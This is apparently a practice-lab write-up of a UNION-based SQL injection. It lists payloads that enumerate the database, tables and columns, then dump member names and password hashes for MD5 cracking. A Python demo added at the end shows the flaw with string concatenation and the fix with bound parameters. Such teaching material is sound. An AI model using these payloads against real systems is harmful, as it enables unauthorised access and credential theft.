1. Testing shows the injection is string-type with 4 columns; the positions echoed back in the page are 2 and 3.
   ?id=' union select 1,2,3,4 -- -
2. Get the database name, which comes back as mozhe_discuz_stormgroup.
   ?id=' union select 1,database(),version(),4 -- -
3. Get the table names. Testing shows there are two: notice and stormgroup_member.
   ?id=' union select 1,table_name,version(),4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup' limit 0,1 -- -
4. Get the column names. There are 4 column names.
   ?id=' union select 1,column_name,column_type,4 from information_schema.columns where table_name='stormgroup_member' limit 0,1 -- -
5. Read the rows of the member table.
   ?id=' union select 1,concat(name,' ',password,' ',status),3,4 from mozhe_discuz_stormgroup.stormgroup_member limit 0,1 -- -
6. Run the password through MD5.
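Why the step 1 payload works and what stops it, as an added example that is not part of the original writeup. It uses an in-memory SQLite database in place of the lab's MySQL; the notice column names, the sample row and the function names are assumptions made for the demonstration.

```python
import sqlite3

# Payload from step 1 of the writeup, and a constructed 3-column variant
# used to show why the column count has to match.
STEP1 = "' union select 1,2,3,4 -- -"
THREE_COLS = "' union select 1,2,3 -- -"

def make_db():
    # Constructed stand-in for the lab's notice table (column names assumed).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notice (id TEXT, title TEXT, content TEXT, author TEXT);
        INSERT INTO notice VALUES ('n1', 'Maintenance', 'Offline tonight', 'admin');
    """)
    return db

def lookup_concat(db, notice_id):
    # Vulnerable: the parameter is pasted between the quotes, so a quote in
    # the input closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT id, title, content, author FROM notice WHERE id='"
           + notice_id + "'")
    return db.execute(sql).fetchall()

def lookup_bound(db, notice_id):
    # Hardened: the value is bound as data and never reaches the SQL parser.
    sql = "SELECT id, title, content, author FROM notice WHERE id = ?"
    return db.execute(sql, (notice_id,)).fetchall()

def column_count_mismatch(db, payload):
    # UNION requires both SELECTs to return the same number of columns,
    # which is why the writeup first settles on 4.
    try:
        lookup_concat(db, payload)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concat", lookup_concat), ("bound", lookup_bound)):
        print(name, "legit  ->", fn(db, "n1"))
        print(name, "step 1 ->", fn(db, STEP1))
    print("3-column union rejected:", column_count_mismatch(db, THREE_COLS))
```

With the bound query the whole payload is compared against the id column as a literal string, so it matches no row and the UNION never executes.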